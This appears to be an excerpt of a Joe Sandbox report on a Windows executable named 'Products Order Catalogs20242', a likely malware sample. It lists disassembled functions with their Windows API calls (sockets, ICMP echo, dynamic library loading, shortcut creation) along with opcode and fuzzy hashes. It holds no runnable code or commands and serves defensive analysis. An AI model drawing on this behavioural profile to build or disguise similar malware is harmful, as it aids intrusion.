                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                • String ID: HH
                                                                                                • API String ID: 2507767853-2761332787
                                                                                                • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: msctls_trackbar32
                                                                                                • API String ID: 3850602802-1010561917
                                                                                                • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                APIs
                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                                • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                • String ID: HH
                                                                                                • API String ID: 1515696956-2761332787
                                                                                                • Opcode ID: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                                                • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                • Opcode Fuzzy Hash: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                                                • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                APIs
                                                                                                  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                • String ID: .lnk
                                                                                                • API String ID: 886957087-24824748
                                                                                                • Opcode ID: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                                                • Instruction ID: 634f95a1702cd93f148e07eb64efb4b351689d97c5b229aafe37579347e0b37e
                                                                                                • Opcode Fuzzy Hash: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                                                • Instruction Fuzzy Hash: E821AF312083009FC700EF55C985F5ABBF4EF89724F148A6EF9549B2E2D7B5A805CB56
                                                                                                APIs
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                • DrawMenuBar.USER32 ref: 00449828
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$InfoItem$Draw_malloc
                                                                                                • String ID: 0
                                                                                                • API String ID: 772068139-4108050209
                                                                                                • Opcode ID: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                • Opcode Fuzzy Hash: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocTask_wcslen
                                                                                                • String ID: hkG
                                                                                                • API String ID: 2651040394-3610518997
                                                                                                • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                • API String ID: 2574300362-1816364905
                                                                                                • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                • API String ID: 2574300362-58917771
                                                                                                • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                • API String ID: 2574300362-3530519716
                                                                                                • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                • API String ID: 2574300362-275556492
                                                                                                • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                • API String ID: 2574300362-3024904723
                                                                                                • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                                                • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1473721057-0
                                                                                                • Opcode ID: 864e75c6b64c8395072179653f2e6e54ed688e1196af63861ce1262d91a289fa
                                                                                                • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                • Opcode Fuzzy Hash: 864e75c6b64c8395072179653f2e6e54ed688e1196af63861ce1262d91a289fa
                                                                                                • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                APIs
                                                                                                • __flush.LIBCMT ref: 00414630
                                                                                                • __fileno.LIBCMT ref: 00414650
                                                                                                • __locking.LIBCMT ref: 00414657
                                                                                                • __flsbuf.LIBCMT ref: 00414682
                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                • String ID:
                                                                                                • API String ID: 3240763771-0
                                                                                                • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 2286883814-0
                                                                                                • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                APIs
                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                • #21.WSOCK32 ref: 004740E0
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$socket
                                                                                                • String ID:
                                                                                                • API String ID: 1881357543-0
                                                                                                • Opcode ID: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                                                • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                • Opcode Fuzzy Hash: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                                                • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                APIs
                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1352109105-0
                                                                                                • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                APIs
